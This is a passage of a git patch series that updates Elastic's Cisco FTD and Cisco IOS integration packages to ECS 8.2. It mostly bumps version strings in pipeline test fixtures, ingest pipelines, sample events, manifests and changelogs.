@@ -48,7 +48,7 @@ }, "@timestamp": "2019-08-14T13:57:19.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -85,7 +85,7 @@ }, "@timestamp": "2019-08-14T13:57:26.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -122,7 +122,7 @@ }, "@timestamp": "2019-08-14T13:57:34.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -159,7 +159,7 @@ }, "@timestamp": "2019-08-14T13:57:43.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -196,7 +196,7 @@ }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -233,7 +233,7 @@ }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -270,7 +270,7 @@ }, "@timestamp": "2019-08-14T13:58:20.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -307,7 +307,7 @@ }, "@timestamp": "2019-08-14T13:58:41.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -344,7 +344,7 @@ }, "@timestamp": "2019-08-14T13:58:47.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -381,7 +381,7 @@ }, "@timestamp": "2019-08-14T13:58:52.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -418,7 +418,7 @@ }, "@timestamp": "2019-08-14T13:58:54.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -455,7 +455,7 @@ }, "@timestamp": "2019-08-14T13:59:10.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -492,7 +492,7 @@ }, "@timestamp": "2019-08-14T13:59:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" 
@@ -529,7 +529,7 @@ }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -566,7 +566,7 @@ }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -603,7 +603,7 @@ }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -640,7 +640,7 @@ }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -677,7 +677,7 @@ }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -714,7 +714,7 @@ }, "@timestamp": "2019-08-14T14:01:13.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -751,7 +751,7 @@ }, "@timestamp": "2019-08-14T14:01:20.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -788,7 +788,7 @@ }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -825,7 +825,7 @@ }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -862,7 +862,7 @@ }, "@timestamp": "2019-08-14T14:01:35.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -899,7 +899,7 @@ }, "@timestamp": "2019-08-14T14:01:36.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -936,7 +936,7 @@ }, "@timestamp": "2019-08-14T14:01:55.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -973,7 +973,7 @@ }, "@timestamp": "2019-08-14T14:01:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" 
@@ -1010,7 +1010,7 @@ }, "@timestamp": "2019-08-14T14:01:57.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -1047,7 +1047,7 @@ }, "@timestamp": "2019-08-14T14:02:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -1084,7 +1084,7 @@ }, "@timestamp": "2019-08-14T14:02:11.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -1121,7 +1121,7 @@ }, "@timestamp": "2019-08-14T14:02:19.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -1158,7 +1158,7 @@ }, "@timestamp": "2019-08-14T14:02:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -1195,7 +1195,7 @@ }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" @@ -1232,7 +1232,7 @@ }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "log": { "level": "debug" diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json index 65f329cfb09..4c73b0d54fe 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json @@ -42,7 +42,7 @@ }, "@timestamp": "2019-08-16T09:54:00.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -156,7 +156,7 @@ }, "@timestamp": "2019-08-16T09:57:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -268,7 +268,7 @@ }, "@timestamp": "2019-08-16T10:04:44.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -378,7 +378,7 @@ }, "@timestamp": "2019-08-16T10:09:47.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json index 69b40deabeb..e378bcbc00d 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -32,7 +32,7 @@ }, "@timestamp": "2018-01-11T01:00:27.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -92,7 +92,7 @@ }, "@timestamp": "2018-01-11T01:00:27.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -150,7 +150,7 @@ }, "@timestamp": "2018-01-11T01:00:27.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -222,7 +222,7 @@ }, "@timestamp": "2018-01-11T01:00:27.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index 9a8469bd434..0d515820599 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -55,7 +55,7 @@ }, "@timestamp": "2019-10-04T15:27:55.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -116,7 +116,7 @@ }, "@timestamp": "2020-01-01T10:42:53.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -197,7 +197,7 @@ }, "@timestamp": "2020-01-02T11:33:20.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ 
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index ae629c1c213..cfd680c1cff 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -38,7 +38,7 @@ }, "@timestamp": "2013-04-15T09:36:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -108,7 +108,7 @@ }, "@timestamp": "2013-04-15T09:36:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -178,7 +178,7 @@ }, "@timestamp": "2014-04-15T13:34:34.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -250,7 +250,7 @@ }, "@timestamp": "2013-04-24T16:00:28.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -327,7 +327,7 @@ }, "@timestamp": "2013-04-24T16:00:27.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -403,7 +403,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -474,7 +474,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -546,7 +546,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -620,7 +620,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -693,7 +693,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -765,7 +765,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ 
@@ -839,7 +839,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -912,7 +912,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -975,7 +975,7 @@ }, "@timestamp": "2011-06-04T21:59:52.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -1048,7 +1048,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1120,7 +1120,7 @@ }, "@timestamp": "2013-04-29T12:59:50.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1185,7 +1185,7 @@ }, "@timestamp": "2013-04-30T09:22:33.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1251,7 +1251,7 @@ }, "@timestamp": "2013-04-30T09:22:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1321,7 +1321,7 @@ }, "@timestamp": "2013-04-30T09:22:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1391,7 +1391,7 @@ }, "@timestamp": "2013-04-30T09:22:39.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1461,7 +1461,7 @@ }, "@timestamp": "2013-04-30T09:22:39.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1531,7 +1531,7 @@ }, "@timestamp": "2013-04-30T09:22:39.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1601,7 +1601,7 @@ }, "@timestamp": "2013-04-30T09:22:40.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1671,7 +1671,7 @@ }, "@timestamp": "2013-04-30T09:22:41.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1741,7 +1741,7 @@ }, "@timestamp": "2013-04-30T09:22:47.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ 
@@ -1811,7 +1811,7 @@ }, "@timestamp": "2013-04-30T09:22:48.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1881,7 +1881,7 @@ }, "@timestamp": "2013-04-30T09:22:56.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -1947,7 +1947,7 @@ }, "@timestamp": "2013-04-30T09:23:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2007,7 +2007,7 @@ }, "@timestamp": "2013-04-30T09:23:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2073,7 +2073,7 @@ }, "@timestamp": "2013-04-30T09:23:06.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2143,7 +2143,7 @@ }, "@timestamp": "2013-04-30T09:23:08.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2213,7 +2213,7 @@ }, "@timestamp": "2013-04-30T09:23:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2283,7 +2283,7 @@ }, "@timestamp": "2013-04-30T09:23:24.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2353,7 +2353,7 @@ }, "@timestamp": "2013-04-30T09:23:34.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2423,7 +2423,7 @@ }, "@timestamp": "2013-04-30T09:23:40.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2493,7 +2493,7 @@ }, "@timestamp": "2013-04-30T09:23:41.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2563,7 +2563,7 @@ }, "@timestamp": "2013-04-30T09:23:43.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2633,7 +2633,7 @@ }, "@timestamp": "2013-04-30T09:23:43.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -2703,7 +2703,7 @@ }, "@timestamp": "2018-04-15T13:34:34.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ 
@@ -2776,7 +2776,7 @@ }, "@timestamp": "2018-12-11T08:01:24.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2855,7 +2855,7 @@ }, "@timestamp": "2018-12-11T08:01:24.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -2932,7 +2932,7 @@ }, "@timestamp": "2018-12-11T08:01:24.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3010,7 +3010,7 @@ }, "@timestamp": "2018-12-11T08:01:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3090,7 +3090,7 @@ }, "@timestamp": "2018-12-11T08:01:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3170,7 +3170,7 @@ }, "@timestamp": "2018-12-11T08:01:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3251,7 +3251,7 @@ }, "@timestamp": "2018-12-11T08:01:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3332,7 +3332,7 @@ }, "@timestamp": "2018-12-11T08:01:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3407,7 +3407,7 @@ }, "@timestamp": "2018-12-11T08:01:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3477,7 +3477,7 @@ }, "@timestamp": "2018-12-11T08:01:38.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3552,7 +3552,7 @@ }, "@timestamp": "2018-12-11T08:01:39.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3630,7 +3630,7 @@ }, "@timestamp": "2018-12-11T08:01:53.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3710,7 +3710,7 @@ }, "@timestamp": "2018-12-11T08:01:53.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ 
@@ -3790,7 +3790,7 @@ }, "@timestamp": "2018-12-11T08:01:53.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3870,7 +3870,7 @@ }, "@timestamp": "2012-08-15T23:30:09.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -3932,7 +3932,7 @@ }, "@timestamp": "2014-09-12T06:50:53.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -3996,7 +3996,7 @@ }, "@timestamp": "2014-09-12T06:51:01.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4060,7 +4060,7 @@ }, "@timestamp": "2014-09-12T06:51:05.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4124,7 +4124,7 @@ }, "@timestamp": "2014-09-12T06:51:05.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4188,7 +4188,7 @@ }, "@timestamp": "2014-09-12T06:51:06.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4252,7 +4252,7 @@ }, "@timestamp": "2014-09-12T06:51:17.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4316,7 +4316,7 @@ }, "@timestamp": "2014-09-12T06:52:48.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4380,7 +4380,7 @@ }, "@timestamp": "2014-09-12T06:53:00.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4455,7 +4455,7 @@ }, "@timestamp": "2014-09-12T06:53:01.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4521,7 +4521,7 @@ }, "@timestamp": "2014-09-12T06:53:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4589,7 +4589,7 @@ }, "@timestamp": "2015-01-14T13:16:13.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ 
@@ -4666,7 +4666,7 @@ }, "@timestamp": "2015-01-14T13:16:14.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "hosts": [ @@ -4750,7 +4750,7 @@ }, "@timestamp": "2015-01-14T13:16:14.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -4833,7 +4833,7 @@ }, "@timestamp": "2015-01-14T13:16:14.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -4898,7 +4898,7 @@ }, "@timestamp": "2009-11-16T14:12:35.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -4954,7 +4954,7 @@ }, "@timestamp": "2009-11-16T14:12:36.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -5016,7 +5016,7 @@ }, "@timestamp": "2009-11-16T14:12:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json index 6b7b183665f..97b3aa17e73 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json @@ -43,7 +43,7 @@ }, "@timestamp": "2019-08-15T16:03:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -158,7 +158,7 @@ }, "@timestamp": "2019-08-15T16:05:33.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -298,7 +298,7 @@ }, "@timestamp": "2019-08-15T16:05:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -436,7 +436,7 @@ }, "@timestamp": "2019-08-15T16:07:00.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -571,7 +571,7 @@ }, "@timestamp": "2019-08-15T16:07:18.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -708,7 +708,7 @@ }, "@timestamp": "2019-08-15T16:07:19.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -853,7 +853,7 @@ }, "@timestamp": "2019-08-16T09:33:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -987,7 +987,7 @@ }, "@timestamp": "2019-08-16T09:33:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1117,7 +1117,7 @@ }, "@timestamp": "2019-08-16T09:35:15.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1243,7 +1243,7 @@ }, "@timestamp": "2019-08-14T15:09:41.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json index ad7484d2202..4a954480a68 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -42,7 +42,7 @@ }, "@timestamp": "2019-08-14T14:54:25.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -144,7 +144,7 @@ }, "@timestamp": "2019-08-14T14:55:02.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -246,7 +246,7 @@ }, "@timestamp": "2019-08-14T15:00:29.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -348,7 +348,7 @@ }, "@timestamp": "2019-08-14T15:01:41.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -454,7 +454,7 @@ }, "@timestamp": "2019-08-14T15:03:28.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -567,7 +567,7 @@ }, "@timestamp": "2019-08-14T15:03:33.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -680,7 +680,7 @@ }, "@timestamp": "2019-08-14T15:09:43.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -808,7 +808,7 @@ }, "@timestamp": "2019-08-16T09:39:03.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -922,7 +922,7 @@ }, "@timestamp": "2019-08-16T09:40:45.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1048,7 +1048,7 @@ }, "@timestamp": "2019-08-16T09:42:07.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json index ee870407ad8..801d4ecc4c6 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json @@ -82,7 +82,7 @@ }, "@timestamp": "2020-03-01T01:02:36.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a6cab24b85f..bc3fb0f7578 100644 --- a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -10,7 +10,7 @@ processors: ignore_missing: true - set: field: ecs.version - value: "8.0.0" + value: "8.2.0" # # Parse the syslog header # 
diff --git a/packages/cisco_ftd/data_stream/log/sample_event.json b/packages/cisco_ftd/data_stream/log/sample_event.json
index f54ade25aff..c68aedd324d 100644
--- a/packages/cisco_ftd/data_stream/log/sample_event.json
+++ b/packages/cisco_ftd/data_stream/log/sample_event.json
@@ -60,7 +60,7 @@
 "port": 80
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f",
diff --git a/packages/cisco_ftd/docs/README.md b/packages/cisco_ftd/docs/README.md
index 9f577061401..15c0a1d6c39 100644
--- a/packages/cisco_ftd/docs/README.md
+++ b/packages/cisco_ftd/docs/README.md
@@ -76,7 +76,7 @@ An example event for `log` looks as following:
 "port": 80
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f",
diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml
index 061eb60b8d0..e0c565e2f15 100644
--- a/packages/cisco_ftd/manifest.yml
+++ b/packages/cisco_ftd/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_ftd
 title: Cisco FTD
-version: 2.0.0
+version: 2.1.0
 license: basic
 description: Collect logs from Cisco FTD with Elastic Agent.
 type: integration
From 5f38202633cfe20bf3a7de7c6535c5b0183f9945 Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Wed, 23 Feb 2022 11:43:19 -0600
Subject: [PATCH 13/23] Update cisco_ios to ECS 8.2
---
 packages/cisco_ios/_dev/build/build.yml | 2 +-
 packages/cisco_ios/changelog.yml | 5 +++
 .../pipeline/test-cisco-ios.log-expected.json | 38 +++++++++----------
 ...est-date-format-tzoffset.log-expected.json | 4 +-
 .../test-date-format.log-expected.json | 36 +++++++++---------
 .../pipeline/test-syslog.log-expected.json | 8 ++--
 .../elasticsearch/ingest_pipeline/default.yml | 2 +-
 .../data_stream/log/sample_event.json | 2 +-
 packages/cisco_ios/docs/README.md | 2 +-
 packages/cisco_ios/manifest.yml | 2 +-
 10 files changed, 53 insertions(+), 48 deletions(-)
diff --git a/packages/cisco_ios/_dev/build/build.yml b/packages/cisco_ios/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_ios/_dev/build/build.yml +++ b/packages/cisco_ios/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index 9c5cd48092b..d681432540a 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.4.1" changes: - description: Add missing event.original mapping diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json index 8986c1b423d..2182e1e68fd 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -13,7 +13,7 @@ "ip": "224.0.0.22" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -66,7 +66,7 @@ "ip": "224.0.0.2" }, 